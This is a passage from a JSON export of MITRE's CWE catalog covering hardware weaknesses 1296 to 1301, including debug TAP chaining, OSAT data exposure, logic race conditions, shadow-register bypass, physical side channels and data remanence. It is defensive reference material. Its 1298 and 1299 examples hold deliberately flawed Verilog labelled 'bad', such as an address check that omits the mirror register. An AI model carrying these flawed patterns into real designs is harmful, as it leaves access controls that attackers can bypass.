keys","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18326"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"121"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1112"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns, Relationships"}}},"1296":{"attr":{"@_ID":"1296","@_Name":"Incorrect Chaining or Granularity of Debug Components","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s debug components contain incorrect chaining or granularity of debug components.","Extended_Description":{"xhtml:p":["For debugging and troubleshooting a chip, several hardware design elements are often implemented, including:","Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could allow unintended access permissions."],"xhtml:ul":{"xhtml:li":["Various Test Access Ports (TAPs) allow boundary scan commands to be executed.","For scanning the internal components of a chip, there are scan cells that allow the chip to be used as a \\"stimulus and response\\" mechanism.","Chipmakers might create custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization","Availability","Accountability"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Modify Memory","Modify Files or Directories"],"Likelihood":"Medium","Note":"Depending on the access to debug component(s) erroneously granted, an attacker could use the debug component to gain additional understanding about the system to further an attack and/or execute other commands. This could compromise any security property, including the ones listed above."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.","Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Appropriate Post-Si tests should be carried out at various authorization levels to ensure that debug components are properly chained and accessible only to users with appropriate credentials.","Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that debug components are properly chained and their granularity is maintained at different authentication levels."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows how an attacker can take advantage of incorrect chaining or missing granularity of debug components.","Body_Text":["In a System-on-Chip (SoC), the user might be able to access the SoC-level TAP with a certain level of authorization. However, this access should not also grant access to all of the internal TAPs (e.g., Core). Separately, if any of the internal TAPs is also stitched to the TAP chain when it should not be because of a logic error, then an attacker can access the internal TAPs as well and execute commands there.","As a related example, suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.).  Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented and the attacker can gain unauthorized access."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-18347","Description":"Incorrect access control in RDP Level 1 on STMicroelectronics STM32F0 series devices allows physically present attackers to extract the device\'s protected firmware via a special sequence of Serial Wire Debug (SWD) commands because there is a race condition between full initialization of the SWD interface and the setup of flash protection.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18347"},{"Reference":"CVE-2020-1791","Description":"There is an improper authorization vulnerability in several smartphones.  The system has a logic-judging error, and, under certain scenarios, a successful exploit could allow the attacker to switch to third desktop after a series of operations in ADB mode. (Vulnerability ID: HWPSIRT-2019-10114).","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1791"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1297":{"attr":{"@_ID":"1297","@_Name":"Unprotected Confidential Information on Device is Accessible by OSAT Vendors","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product does not adequately protect confidential information on the device from being accessed by Outsourced Semiconductor Assembly and Test (OSAT) vendors.","Extended_Description":{"xhtml:p":["In contrast to complete vertical integration of architecting, designing, manufacturing, assembling, and testing chips all within a single organization, an organization can choose to simply architect and design a chip before outsourcing the rest of the process to OSAT entities (e.g., external foundries and test houses). In the latter example, the device enters an OSAT facility in a much more vulnerable pre-production stage where many debug and test modes are accessible. Therefore, the chipmaker must place a certain level of trust with the OSAT. To counter this, the chipmaker often requires the OSAT partner to enter into restrictive non-disclosure agreements (NDAs). Nonetheless, OSAT vendors likely have many customers, which increases the risk of accidental sharing of information. There may also be a security vulnerability in the information technology (IT) system of the OSAT facility. Alternatively, a malicious insider at the OSAT facility may carry out an insider attack. Considering these factors, it behooves the chipmaker to minimize any confidential information in the device that may be accessible to the OSAT vendor.","Logic errors during design or synthesis could misconfigure the interconnection of the debug components, which could provide improper authorization to sensitive information."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control","Authentication","Authorization","Availability","Accountability","Non-Repudiation"],"Impact":["Gain Privileges or Assume Identity","Bypass Protection Mechanism","Execute Unauthorized Code or Commands","Modify Memory","Modify Files or Directories"],"Likelihood":"Medium","Note":"The impact depends on the confidential information itself and who is inadvertently granted access. For example, if the confidential information is a key that can unlock all the parts of a generation, the impact could be severe."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.","Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:ul":{"xhtml:li":["\u2022\\tEnsure that when an OSAT vendor is allowed to access test interfaces necessary for preproduction and returned parts, the vendor only pulls the minimal information necessary. Also, architect the product in such a way that, when an \u201cunlock device\u201d request comes, it only unlocks that specific part and not all the parts for that product line.","\u2022\\tEnsure that the product\u2019s non-volatile memory (NVM) is scrubbed of all confidential information and secrets before handing it over to an OSAT.","\u2022\\tArrange to secure all communication between an OSAT facility and the chipmaker."]}},"Effectiveness":"Moderate"}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following example shows how an attacker can take advantage of a piece of confidential information that has not been protected from the OSAT.","Body_Text":["Suppose the preproduction device contains NVM (a storage medium that by definition/design can retain its data without power), and this NVM contains a key that can unlock all the parts for that generation.  An OSAT facility accidentally leaks the key.","Compromising a key that can unlock all the parts of a generation can be devastating to a chipmaker.","The likelihood of such a compromise can be reduced by ensuring all memories on the preproduction device are properly scrubbed."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1113"}},{"attr":{"@_External_Reference_ID":"REF-1114"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-29"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1298":{"attr":{"@_ID":"1298","@_Name":"Hardware Logic Contains Race Conditions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A race condition in the hardware logic results in undermining security guarantees of the system.","Extended_Description":{"xhtml:p":"A race condition in logic circuits typically occurs when a logic gate gets inputs from signals that have traversed different paths while originating from the same source. Such inputs to the gate can change at slightly different times in response to a change in the source signal. This results in a timing error or a glitch (temporary or permanent) that causes the output to change to an unwanted state before settling back to the desired state. If such timing errors occur in access control logic or finite state machines that are implemented in security sensitive flows, an attacker might exploit them to circumvent existing protections."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"362","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Adopting design practices that encourage designers to recognize and eliminate race conditions, such as Karnaugh maps, could result in the decrease in occurrences of race conditions."},{"Phase":"Implementation","Description":"Logic redundancy can be implemented along security critical paths to prevent race conditions. To avoid metastability, it is a good practice in general to default to a secure state in which access is not given to untrusted agents."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The code below shows a 2x1 multiplexor using logic gates. Though the code shown below results in the minimum gate solution, it is disjoint and causes glitches.","Example_Code":[{"#text":"// 2x1 Multiplexor using logic-gatesmodule glitchEx();wire not_sel;wire and_out1, and_out2;assign not_sel = ~sel;assign and_out1 = not_sel &amp; in0;assign and_out2 = sel &amp; in1;// Buggy line of code:assign z = and_out1 | and_out2; // glitch in signal zendmodule","attr":{"@_Nature":"bad","@_Language":"Verilog"},"xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"#text":"input wire in0, in1, sel,output wire z","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},{"#text":"assign z &lt;= and_out1 or and_out2 or (in0 and in1);","attr":{"@_Nature":"good","@_Language":"Verilog"}}],"Body_Text":["The buggy line of code, commented above, results in signal \'z\' periodically changing to an unwanted state. Thus, any logic that references signal \'z\' may access it at a time when it is in this unwanted state. This line should be replaced with the line shown below in the Good Code Snippet which results in signal \'z\' remaining in a continuous, known, state. Reference for the above code, along with waveforms for simulation can be found in the references below.","This line of code removes the glitch in signal z."]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1115"}},{"attr":{"@_External_Reference_ID":"REF-1116"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1299":{"attr":{"@_ID":"1299","@_Name":"Missing Protection Mechanism for Alternate Hardware Interface","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The lack of protections on alternate paths to access\\n                control-protected assets (such as unprotected shadow registers\\n                and other external facing unguarded interfaces) allows an\\n                attacker to bypass existing protections to the asset that are\\n\\t\\tonly performed against the primary path.","Extended_Description":{"xhtml:p":["An asset inside a chip might have access-control\\n                    protections through one interface. However, if all paths to\\n                    the asset are not protected, an attacker might compromise\\n                    the asset through alternate paths. These alternate paths\\n                    could be through shadow or mirror registers inside the IP\\n                    core, or could be paths from other external-facing\\n                    interfaces to the IP core or SoC.","Consider an SoC with various interfaces such as UART,\\n                    SMBUS, PCIe, USB, etc. If access control is implemented for\\n                    SoC internal registers only over the PCIe interface, then\\n                    an attacker could still modify the SoC internal registers\\n                    through alternate paths by coming through interfaces such\\n                    as UART, SMBUS, USB, etc.","Alternatively, attackers might be able to bypass\\n                    existing protections by exploiting unprotected, shadow\\n                    registers. Shadow registers and mirror registers typically\\n                    refer to registers that can be accessed from multiple\\n                    addresses. Writing to or reading from the aliased/mirrored\\n                    address has the same effect as writing to the address of\\n                    the main register. They are typically implemented within an\\n                    IP core or SoC to temporarily hold certain data. These data\\n                    will later be updated to the main register, and both\\n                    registers will be in synch. If the shadow registers are not\\n                    access-protected, attackers could simply initiate\\n                    transactions to the shadow registers and compromise system\\n                    security."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1191","@_View_ID":"1194","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"420","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"288","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Bus/Interface IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Resource Consumption (Other)","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Quality Degradation"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"},{"Phase":"Implementation","Description":"Protect assets from accesses against all potential interfaces and alternate paths.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Register SECURE_ME is located at address 0xF00. A\\n                            mirror of this register called COPY_OF_SECURE_ME is\\n                            at location 0x800F00. The register SECURE_ME is\\n                            protected from malicious agents and only allows\\n                            access to select, while COPY_OF_SECURE_ME is not.","Access control is implemented using an allowlist (as\\n                            indicated by acl_oh_allowlist). The identity of the\\n                            initiator of the transaction is indicated by the\\n                            one hot input, incoming_id. This is checked against\\n                            the acl_oh_allowlist (which contains a list of\\n                            initiators that are allowed to access the asset).","Though this example is shown in Verilog, it will\\n                            apply to VHDL as well."]},"Example_Code":[{"#text":"module foo_bar(data_out, data_in, incoming_id, address, clk, rst_n);output [31:0] data_out;input [31:0] data_in, incoming_id, address;input clk, rst_n;wire write_auth, addr_auth;reg [31:0] data_out, acl_oh_allowlist, q;assign write_auth = | (incoming_id &amp; acl_oh_allowlist) ? 1 : 0;always @*assign addr_auth = (address == 32\u2019hF00) ? 1: 0;always @ (posedge clk or negedge rst_n)endmodule","attr":{"@_Nature":"informative","@_Language":"Verilog"},"xhtml:br":["","","","","","","","","","",""],"xhtml:div":[{"#text":"acl_oh_allowlist &lt;= 32\u2019h8312;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"if (!rst_n)elseend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"beginend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"q &lt;= 32\u2019h0;data_out &lt;= 32\u2019h0;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},{"#text":"beginend","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:div":{"#text":"q &lt;= (addr_auth &amp; write_auth) ? data_in: q;data_out &lt;= q;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}]}]},{"#text":"assign addr_auth = (address == 32\u2019hF00) ? 1: 0;","attr":{"@_Nature":"bad","@_Language":"Verilog"}},{"#text":"assign addr_auth = (address == 32\u2019hF00 || address == 32\u2019h800F00) ? 1: 0;","attr":{"@_Nature":"good","@_Language":"Verilog"}}],"Body_Text":"The bugged line of code is repeated in the Bad\\n                        example above. Weakness arises from the fact that the\\n                        SECURE_ME register can be modified by writing to the\\n                        shadow register COPY_OF_SECURE_ME, the address of\\n                        COPY_OF_SECURE_ME should also be included in the check.\\n                        That buggy line of code should instead be replaced as\\n                        shown in the Good Code Snippet below."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2017-18293","Description":"When GPIO is protected by blocking access\\n                        to corresponding GPIO resource registers,\\n                        protection can be bypassed by writing to the\\n                        corresponding banked GPIO registers instead.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18293"},{"Reference":"CVE-2020-15483","Description":"monitor device allows access to physical UART debug port without authentication","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15483"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"554"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-02"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Observed_Examples, Related_Attack_Patterns"}]}},"1300":{"attr":{"@_ID":"1300","@_Name":"Improper Protection of Physical Side Channels","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The device does not contain sufficient protection\\n\\tmechanisms to prevent physical side channels from exposing\\n\\tsensitive information due to patterns in physically observable\\n\\tphenomena such as variations in power consumption,\\n\\telectromagnetic emissions (EME), or acoustic emissions.","Extended_Description":{"xhtml:p":["An adversary could monitor and measure physical\\n\\t  phenomena to detect patterns and make inferences, even if it\\n\\t  is not possible to extract the information in the digital\\n\\t  domain.","Physical side channels have been well-studied for\\n\\t  decades in the context of breaking implementations of\\n\\t  cryptographic algorithms or other attacks against security\\n\\t  features. These side channels may be easily observed by an\\n\\t  adversary with physical access to the device, or using a\\n\\t  tool that is in close proximity.  If the adversary can\\n\\t  monitor hardware operation and correlate its data processing\\n\\t  with power, EME, and acoustic measurements, the adversary\\n\\t  might be able to recover of secret keys and data."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"203","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Perform a set of leakage detection tests such as the procedure outlined in the Test Vector Leakage Assessment (TVLA) test requirements for AES [REF-1230].  TVLA is the basis for the ISO standard 17825 [REF-1229]. A separate methodology is provided by [REF-1228]. Note that sole reliance on this method might not yield expected results [REF-1239] [REF-1240].","Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":{"xhtml:p":"Post-silicon, perform full side-channel attacks (penetration testing) covering as many known leakage models as possible against test code."},"Effectiveness":"Moderate"},{"Method":"Manual Analysis","Description":{"xhtml:p":"Pre-silicon - while the aforementioned TVLA methods can be performed post-silicon, models of device power consumption or other physical emanations can be built from information present at various stages of the hardware design process before fabrication. TVLA or known side-channel attacks can be applied to these simulated traces and countermeasures applied before tape-out.  Academic research in this field includes [REF-1231] [REF-1232] [REF-1233]."},"Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Apply blinding or masking techniques to implementations of cryptographic algorithms."},{"Phase":"Implementation","Description":"Add shielding or tamper-resistant protections to the device to increase the difficulty of obtaining measurements of the side-channel."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider a device that checks a\\n\\t\\t    passcode to unlock the screen.","Example_Code":[{"#text":"As each character of\\n\\t\\t    the PIN number is entered, a correct character\\n\\t\\t    exhibits one current pulse shape while an\\n\\t\\t    incorrect character exhibits a different current\\n\\t\\t    pulse shape.","attr":{"@_Nature":"bad"}},{"#text":"Rather than comparing\\n\\t\\t    each character to the correct PIN value as it is\\n\\t\\t    entered, the device could accumulate the PIN in a\\n\\t\\t    register, and do the comparison all at once at the\\n\\t\\t    end. Alternatively, the components for the\\n\\t\\t    comparison could be modified so that the current\\n\\t\\t    pulse shape is the same regardless of the\\n\\t\\t    correctness of the entered\\n\\t\\t    character.","attr":{"@_Nature":"good"}}],"Body_Text":"PIN numbers used to unlock a cell phone\\n\\t\\t    should not exhibit any characteristics about\\n\\t\\t    themselves. This creates a side channel. An\\n\\t\\t    attacker could monitor the pulses using an\\n\\t\\t    oscilloscope or other method. Once the first\\n\\t\\t    character is correctly guessed (based on the\\n\\t\\t    oscilloscope readings), they can then move to the\\n\\t\\t    next character, which is much more efficient than\\n\\t\\t    the brute force method of guessing every possible\\n\\t\\t    sequence of characters."},{"Intro_Text":"Consider the device vulnerability CVE-2021-3011, which affects certain microcontrollers [REF-1221]. The Google Titan Security Key is used for two-factor authentication using cryptographic algorithms. The device uses an internal secret key for this purpose and exchanges information based on this key for the authentication. If this internal secret key and the encryption algorithm were known to an adversary, the key function could be duplicated, allowing the adversary to masquerade as the legitimate user.","Example_Code":[{"#text":"The local method of extracting the secret key consists of plugging the key into a USB port and using electromagnetic (EM) sniffing tools and computers.","attr":{"@_Nature":"bad"}},{"#text":"Several solutions could have been considered by the manufacturer. For example, the manufacturer could shield the circuitry in the key or add randomized delays, indirect calculations with random values involved, or randomly ordered calculations to make extraction much more difficult or a combination of these techniques.","attr":{"@_Nature":"good"}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2021-3011","Description":"electromagnetic-wave side-channel in security-related microcontrollers allows extraction of private key","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"},{"Reference":"CVE-2013-4576","Description":"message encryption software uses certain instruction sequences that allows RSA key extraction using a chosen-ciphertext attack and acoustic cryptanalysis","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4576"},{"Reference":"CVE-2020-28368","Description":"virtualization product allows recovery of AES keys from the guest OS using a side channel attack against a power/energy monitoring interface.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28368"},{"Reference":"CVE-2019-18673","Description":"power consumption varies based on number of pixels being illuminated in a display, allowing reading of secrets such as the PIN by using the USB interface to measure power consumption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18673"}]},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"189"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1117"}},{"attr":{"@_External_Reference_ID":"REF-1118"}},{"attr":{"@_External_Reference_ID":"REF-1119"}},{"attr":{"@_External_Reference_ID":"REF-1120"}},{"attr":{"@_External_Reference_ID":"REF-1055"}},{"attr":{"@_External_Reference_ID":"REF-1218"}},{"attr":{"@_External_Reference_ID":"REF-1221"}},{"attr":{"@_External_Reference_ID":"REF-1228"}},{"attr":{"@_External_Reference_ID":"REF-1229"}},{"attr":{"@_External_Reference_ID":"REF-1230"}},{"attr":{"@_External_Reference_ID":"REF-1231","@_Section":"pp. 305-319"}},{"attr":{"@_External_Reference_ID":"REF-1232","@_Section":"pp. 123-130"}},{"attr":{"@_External_Reference_ID":"REF-1233"}},{"attr":{"@_External_Reference_ID":"REF-1234"}},{"attr":{"@_External_Reference_ID":"REF-1235"}},{"attr":{"@_External_Reference_ID":"REF-1239"}},{"attr":{"@_External_Reference_ID":"REF-1240"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-29"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Contribution":[{"attr":{"@_Type":"Content"},"Contribution_Name":"Anders Nordstrom, Alric Althoff","Contribution_Organization":"Tortuga Logic","Contribution_Date":"2021-10-11","Contribution_Comment":"Provided detection methods, observed examples, and references"},{"attr":{"@_Type":"Content"},"Contribution_Name":"Nicole Fern","Contribution_Organization":"Riscure","Contribution_Date":"2021-10-13","Contribution_Comment":"Provided detection methods, observed examples, and references"}]}},"1301":{"attr":{"@_ID":"1301","@_Name":"Insufficient or Incomplete Data Removal within Hardware Component","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s data removal process does not completely delete all data and potentially sensitive information within hardware components.","Extended_Description":{"xhtml:p":["Physical properties of hardware devices, such as remanence of magnetic media, residual charge of ROMs/RAMs, or screen burn-in may still retain sensitive data after a data removal process has taken place and power is removed.","Recovering data after erasure or overwriting is possible due to a phenomenon called data remanence. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree such that even after the original data is erased that data can still be recovered through physical characterization of the memory cells."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Apply blinding or masking techniques to implementations of cryptographic algorithms."},{"Phase":"Implementation","Description":"Alter the method of erasure, add protection of media, or destroy the media to protect the data."}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"37"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1117"}},{"attr":{"@_External_Reference_ID":"REF-1118"}},{"attr":{"@_External_Reference_ID":"REF-1119"}},{"attr":{"@_External_Reference_ID":"REF-1120"}},{"attr":{"@_External_Reference_ID":"REF-1055"}}]},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content 